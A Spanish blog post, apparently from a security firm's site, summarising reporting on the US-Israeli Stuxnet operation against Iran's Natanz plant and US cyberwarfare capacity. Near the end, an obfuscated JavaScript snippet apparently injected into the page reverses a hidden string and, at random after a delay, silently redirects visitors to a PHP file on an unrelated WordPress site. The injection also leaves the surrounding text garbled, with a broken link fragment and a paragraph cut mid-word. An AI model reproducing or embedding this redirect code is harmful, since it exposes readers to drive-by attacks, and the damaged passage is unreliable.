ARTICULO SOBRE CIBERTERRORISMO Y LA GUERRA NUCLEAR (STUXNET, DUQU, FLAME)

La increíble historia de los virus que cambiarán el modo de hacer guerras: El presidente George W. Bush quería más opciones. En 2006 Irán había retomado el enriquecimiento de uranio en la planta de Natanz (en la foto). Estados Unidos solo tenía dos opciones: permitir la hipotética bomba nuclear iraní o impedirla con un ataque militar.

Bush quería algo más. La única alternativa que encontraron la secretaria de Estado, Condoleezza Rice, y el asesor de Seguridad Nacional, Stephen Hadley, procedía de una unidad recién creada, el Cibercomando de Estados Unidos.

 

 

 

 

 

 

 

 

 

 

FOTO NATANZ

La propuesta era simple: introducir un virus en el sistema de control de los centrifugadores que enriquecen uranio en Natanz para que diera órdenes erróneas y los aparatos se autodestruyeran. Bush era escéptico, pero aceptó. Empezaron el trabajo.

Necesitaban probar el virus en modelos iguales a los anticuados iraníes, que procedían de una venta del padre del programa nuclear pakistaní, A. Q. Khan. Por suerte, Estados Unidos almacenaba en Tennessee unos iguales: venían de los restos del programa nuclear libio que Muamar Gadafi había abandonado en 2003.

Al cabo de unos meses se hicieron las primeras pruebas. Fueron un éxito. Poco antes del final de su presidencia, Bush se encontró en la mesa de la “Situation Room” de la Casa Blanca el polvo de los centrifugadores destruidos. Habían creado el primer virus informático capaz de salir del ordenador y destruir artefactos del mundo real. Los mejores ejércitos del mundo sumarán otra opción a su arsenal de tierra, mar, aire y espacio: la red.

El programa americano para crear el virus se llamó con el código “Juegos Olímpicos”, aunque en el mundo lo dio a conocer el nombre que le puso un informático de Microsoft, Stuxnet.

Esta historia y la confirmación de que Estados Unidos fabricó este virus procede de una investigación del periodista del New York Times David Sanger. Publicó primero un artículo en el periódico, que resumía parte de sus descubrimientos de su nuevo libro, Confront and Conceal, que salió el martes. Estados Unidos no trabajó solo: una unidad israelí especializada en ciberataques ayudaba.

La colaboración tenía para los americanos dos motivos: los israelíes son buenos y si les tenían cerca quizá lograban convencerles de que había otras maneras de frenara el programa nuclear iraní sin usar misiles.

Ahora venía la otra parte difícil: meter el virus en los ordenadores de Natanz que controlan los centrifugadores. El reto era doble. Primero había que mandar un virus espía para que describiera cómo funcionaban. Pero había otro problema aún mayor: Natanz no está conectado a internet. El virus debía saltar. La solución era un usb.

Algún técnico o científico debía conectar un disco duro portátil en su ordenador y luego pasarlo a las máquinas de la central. Lo lograron; no está claro si con ayuda consciente dentro de Irán o no (Sanger escribe que tras el usb, “métodos más sofisticados se desarrollaron para enviar el código maligno”; no dice cuáles). El virus envió las instrucciones de vuelta a Estados Unidos. El primer sabotaje de infraestructura real mediante un programa informático estaba casi a punto.

El virus era tan complejo y trabajaba con tanta discreción que los iraníes no entendían qué ocurría cuando todo empezó a fallar: imaginaron defectos de fabricación, errores imprevistos y llegaron incluso a despedir científicos. El objetivo de Stuxnet era retrasar las intenciones iraníes y lo consiguió: Natanz era una planta destinada para 50 mil centrifugadores; hoy hay aún menos de diez mil.

Según Sanger, con Obama ya elegido, los dos presidentes se reunieron en el Despacho Oval a solas. Bush pidió a su sucesor que mantuviera dos programas secretos: Stuxnet y los aviones sin piloto contra Al Qaeda en Pakistán y otros países. Obama cumplió con creces.

Ahora se ha confirmado gracias a Sanger que Estados Unidos e Israel estaban detrás de Stuxnet, pero hace casi dos años que se sabe que existía y se sospechaba que solo podía estar detrás un país con los recursos americanos. En 2010, una variante del virus original para llegar a más centrifugadores -aparentemente preparada por los israelíes, aunque no está claro- no reconoció bien su destino y salió a la red abierta.

En junio de 2010, una empresa bielorrusa de antivirus lo detectó cuando ya había infectado miles de ordenadores. Con el tiempo, otros expertos en seguridad informática desglosaron el código y comprobaron el nivel de perfección y vieron que el virus estaba sobre todo en ordenadores iraníes y, en menor medida, indonesios e indios. Fue fácil intuir qué había ocurrido.

Stuxnet es sobre todo la confirmación de que Estados Unidos trabaja desde hace años en ciberarmas de ataque, no solo defensivas o de espionaje. Aunque en ese ámbito también los americanos están a otro nivel. La mejor prueba es un nuevo centro de la Agencia de Seguridad Nacional en Utah que estará listo en septiembre de 2013 (en la imagen).

Estará dedicado a almacenar y analizar -espiar, en suma- información secreta de otros países y de sus ciudadanos. Será, según cuenta Wired, en este largo reportaje, es el primer centro capaz de poder analizar cantidades ingentes de datos para ver qué es interesante. Ningún país está a ese nivel.

El espionaje industrial de empresas y funcionarios americanos desde China es célebre. El robo de datos financieros desde Europa del este y Rusia es conocido. Los ataques de Anonymous se hicieron famosos. Pero cualquier compración con la capacidad americana y lo que veremos en el futuro es ridícula.

Estados Unidos se planteó eliminar en 2011 las defensas antiaéreas libias con un ataque en la red. Les hubiera llevado un año, según un funcionario. Pero ese tiempo se reducirá. El único intento parecido al del Stuxnet lo hizo Israel cuando trató con escaso éxito de limitar las defensas sirias cuando destruyó su reactor nuclear en 2007.

Nadie más está a niveles parecidos. Pero todo llegará. Ese centro impresionante que construye Estados Unidos cuesta 2 mil millones de dólares; Irán prevé invertir mil en su ciberejército. ¿Qué consecuencias tendrá para las guerras del futuro? Los expertos creen que hará variar estrategias, pero no dará más opciones a países menos poderosos.


FOTO construcción centro de la Agencia de Seguridad Nacional en Utah

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toit.wordpress.com/2011/11/16/duqu-virus-informatico/”> INFORMACION SOBRE EL DUQU

tos niveles requiere también por ahora demasiada inversión y capacidad como para ser significativo. La red traerá nuevas opciones militares, pero la única arma que por ahora ha cambiado las guerras es aún la bomba nuclear.

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con
info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies